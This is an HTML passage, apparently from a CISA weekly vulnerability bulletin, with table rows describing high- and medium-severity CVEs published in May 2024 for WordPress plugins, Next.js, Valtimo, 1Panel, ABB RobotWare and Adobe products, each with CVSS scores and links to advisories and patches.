<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4352&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4352" target="_blank">CVE-2024-4352</a><br><a href="https://www.themeum.com/product/tutor-lms/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c647beda-cf73-4372-975f-a8c8ed05217f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>themium--Tutor LMS Pro<br> </td>
<td>The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4222&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4222" target="_blank">CVE-2024-4222</a><br><a href="https://www.themeum.com/product/tutor-lms/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/942fffb6-2719-4b70-9759-21b2d50002c5?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thimpress--LearnPress WordPress LMS Plugin<br> </td>
<td>The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'term_id' parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4434&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4434" target="_blank">CVE-2024-4434</a><br><a href="https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.6.5/inc/Databases/class-lp-course-db.php#L508" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082204/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>thimpress--LearnPress WordPress LMS Plugin<br> </td>
<td>The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_post_materials' function in versions up to, and including, 4.2.6.5. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4397&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4397" target="_blank">CVE-2024-4397</a><br><a href="https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.6.5/inc/rest-api/v1/frontend/class-lp-rest-material-controller.php#L98" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083657/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec20d5c4-4c41-4ec9-8d0a-ec8f03634f7d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>unitecms--Unlimited Elements For Elementor (Free Widgets, Addons, Templates)<br> </td>
<td>The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.5.102 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3055&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3055" target="_blank">CVE-2024-3055</a><br><a href="https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/tags/1.5.93/inc_php/framework/db.class.php#L238" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3081509%40unlimited-elements-for-elementor%2Ftrunk&amp;old=3076456%40unlimited-elements-for-elementor%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ebc0c8e6-a365-4ef7-9c1a-41454855096c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>unitecms--Unlimited Elements For Elementor (Free Widgets, Addons, Templates)<br> </td>
<td>The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to command injection in all versions up to, and including, 1.5.102. This is due to insufficient filtering of template attributes during the creation of HTML for custom widgets This makes it possible for authenticated attackers, with administrator-level access and above, to execute arbitrary commands on the server.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2662&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2662" target="_blank">CVE-2024-2662</a><br><a href="https://plugins.trac.wordpress.org/changeset/3071404/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_template_engine.class.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/58492dbb-b9e0-4477-b85d-ace06dba954c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>valtimo-platform--valtimo-frontend-libraries<br> </td>
<td>Valtimo is an open source business process and case management platform. When opening a form in Valtimo, the access token (JWT) of the user is exposed to `api.form.io` via the the `x-jwt-token` header. An attacker can retrieve personal information from this token, or use it to execute requests to the Valtimo REST API on behalf of the logged-in user. This issue is caused by a misconfiguration of the Form.io component. The following conditions have to be met in order to perform this attack: An attacker needs to have access to the network traffic on the `api.form.io` domain; the content of the `x-jwt-token` header is logged or otherwise available to the attacker; an attacker needs to have network access to the Valtimo API; and an attacker needs to act within the time-to-live of the access token. The default TTL in Keycloak is 5 minutes. Versions 10.8.4, 11.1.6 and 11.2.2 have been patched.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34706&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34706" target="_blank">CVE-2024-34706</a><br><a href="https://github.com/valtimo-platform/valtimo-frontend-libraries/commit/1aaba5ef5750dafebbc7476fb08bf2375a25f19e" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/valtimo-platform/valtimo-frontend-libraries/commit/8c2dbf2a41180d2b0358d878290e4d37168f0fb6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/valtimo-platform/valtimo-frontend-libraries/commit/d65e05fd2784bd4a628778b34a5b79ce2f0cef8c" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/valtimo-platform/valtimo-frontend-libraries/security/advisories/GHSA-xcp4-62vj-cq3r" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>vendor or project--product name<br> </td>
<td>A potential vulnerability has been identified for OpenText Operations Bridge Reporter. The vulnerability could be exploited to inject malicious SQL queries. An attack requires to be an authenticated administrator of OBR with network access to the OBR web application.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2021-22508&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2021-22508" target="_blank">CVE-2021-22508</a><br><a href="https://support.microfocus.com/kb/kmdoc.php?id=KM03793174" target="_blank">security@opentext.com</a></td>
</tr>
<tr>
<td>vercel--next.js<br> </td>
<td>Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34350&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34350" target="_blank">CVE-2024-34350</a><br><a href="https://github.com/vercel/next.js/security/advisories/GHSA-77r5-gw3j-2mpf" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>vercel--next.js<br> </td>
<td>Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34351&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34351" target="_blank">CVE-2024-34351</a><br><a href="https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/vercel/next.js/pull/62561" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>weDevs--WP User Frontend<br> </td>
<td>Improper Privilege Management vulnerability in weDevs WP User Frontend allows Privilege Escalation.This issue affects WP User Frontend: from n/a through 3.6.5.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47682&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47682" target="_blank">CVE-2023-47682</a><br><a href="https://patchstack.com/database/vulnerability/wp-user-frontend/wordpress-wp-user-frontend-plugin-3-6-5-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>wpForo--wpForo Forum<br> </td>
<td>Improper Privilege Management vulnerability in wpForo wpForo Forum allows Privilege Escalation.This issue affects wpForo Forum: from n/a through 2.2.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47868&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47868" target="_blank">CVE-2023-47868</a><br><a href="https://patchstack.com/database/vulnerability/wpforo/wordpress-wpforo-plugin-2-2-3-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
</tbody>
</table>
<p><a href="https://www.cisa.gov/#top">Back to top</a></p>
</div>
<div>
<h2>Medium Vulnerabilities</h2>
<table summary="Medium Vulnerabilities" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th scope="col" role="columnheader" data-tablesaw-priority="persist">Primary<br>Vendor -- Product</th>
<th scope="col" role="columnheader">Description</th>
<th scope="col" role="columnheader">Published</th>
<th scope="col" role="columnheader">CVSS Score</th>
<th scope="col" role="columnheader">Source &amp; Patch Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>10Web Form Builder Team--Form Maker by 10Web<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10Web Form Builder Team Form Maker by 10Web allows Stored XSS.This issue affects Form Maker by 10Web: from n/a through 1.15.24.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34437&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34437" target="_blank">CVE-2024-34437</a><br><a href="https://patchstack.com/database/vulnerability/form-maker/wordpress-form-maker-by-10web-plugin-1-15-24-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>1Panel-dev--1Panel<br> </td>
<td>1Panel is an open source Linux server operation and maintenance management panel. Prior to v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `&gt;` can be used to achieve arbitrary file writing. This vulnerability is fixed in v1.10.3-lts.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34352&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34352" target="_blank">CVE-2024-34352</a><br><a href="https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>ABB--RobotWare 6<br> </td>
<td>An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible. The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system. Below are reported vulnerabilities in the Robot Ware versions. * IRC5- RobotWare 6 &lt; 6.15.06 except 6.10.10, and 6.13.07 * OmniCore- RobotWare 7 &lt; 7.14</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1914&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1914" target="_blank">CVE-2024-1914</a><br><a href="https://search.abb.com/library/Download.aspx?DocumentID=SI20330&amp;LanguageCode=en&amp;DocumentPartId=&amp;Action=Launch" target="_blank">cybersecurity@ch.abb.com</a></td>
</tr>
<tr>
<td>AREOI--All Bootstrap Blocks<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AREOI All Bootstrap Blocks allows Stored XSS.This issue affects All Bootstrap Blocks: from n/a through 1.3.15.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35169&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35169" target="_blank">CVE-2024-35169</a><br><a href="https://patchstack.com/database/vulnerability/all-bootstrap-blocks/wordpress-all-bootstrap-blocks-plugin-1-3-15-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>AROX SOLUTION--School ERP Pro+Responsive<br> </td>
<td>Vulnerability in School ERP Pro+Responsive 1.0 that allows XSS via the username and password parameters in '/index.php'. This vulnerability allows an attacker to partially take control of the victim's browser session.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4822&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4822" target="_blank">CVE-2024-4822</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-school-erp-proresponsive-arox-solution" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>AROX SOLUTION--School ERP Pro+Responsive<br> </td>
<td>Vulnerability in School ERP Pro+Responsive 1.0 that allows XSS via the index '/schoolerp/office_admin/' in the parameters es_bankacc, es_bank_name, es_bank_pin, es_checkno, es_teller_number, dc1 and dc2. An attacker could send a specially crafted JavaScript payload to an authenticated user and partially hijack their browser session.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4823&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4823" target="_blank">CVE-2024-4823</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-school-erp-proresponsive-arox-solution" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Academy LMS--Academy LMS<br> </td>
<td>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Academy LMS academy.This issue affects Academy LMS: from n/a through 1.9.25.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35171&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35171" target="_blank">CVE-2024-35171</a><br><a href="https://patchstack.com/database/vulnerability/academy/wordpress-academy-lms-plugin-1-9-25-sensitive-data-exposure-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Adam DeHaven--Perfect Pullquotes<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adam DeHaven Perfect Pullquotes allows Stored XSS.This issue affects Perfect Pullquotes: from n/a through 1.7.5.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33951&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33951" target="_blank">CVE-2024-33951</a><br><a href="https://patchstack.com/database/vulnerability/perfect-pullquotes/wordpress-perfect-pullquotes-plugin-1-7-5-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30311&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30311" target="_blank">CVE-2024-30311</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30312&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30312" target="_blank">CVE-2024-30312</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34101&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34101" target="_blank">CVE-2024-34101</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30283&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30283" target="_blank">CVE-2024-30283</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30286&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30286" target="_blank">CVE-2024-30286</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30287&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30287" target="_blank">CVE-2024-30287</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30298&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30298" target="_blank">CVE-2024-30298</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Illustrator<br> </td>
<td>Illustrator versions 28.4, 27.9.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20793&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20793" target="_blank">CVE-2024-20793</a><br><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-30.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Substance3D - Designer<br> </td>
<td>Substance3D - Designer versions 13.1.1 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30281&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30281" target="_blank">CVE-2024-30281</a><br><a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb24-35.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Substance3D - Painter<br> </td>
<td>Substance3D - Painter versions 9.1.2 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30308&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30308" target="_blank">CVE-2024-30308</a><br><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-31.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Substance3D - Painter<br> </td>
<td>Substance3D - Painter versions 9.1.2 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30309&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30309" target="_blank">CVE-2024-30309</a><br><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-31.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Aleksei Polechin (alek)--Archives Calendar Widget<br> </td>
<td>Administrator Cross Site Scripting (XSS) in Archives Calendar Widget &lt;= 1.0.15 versions.</td>
<td>2024-05-14</td>
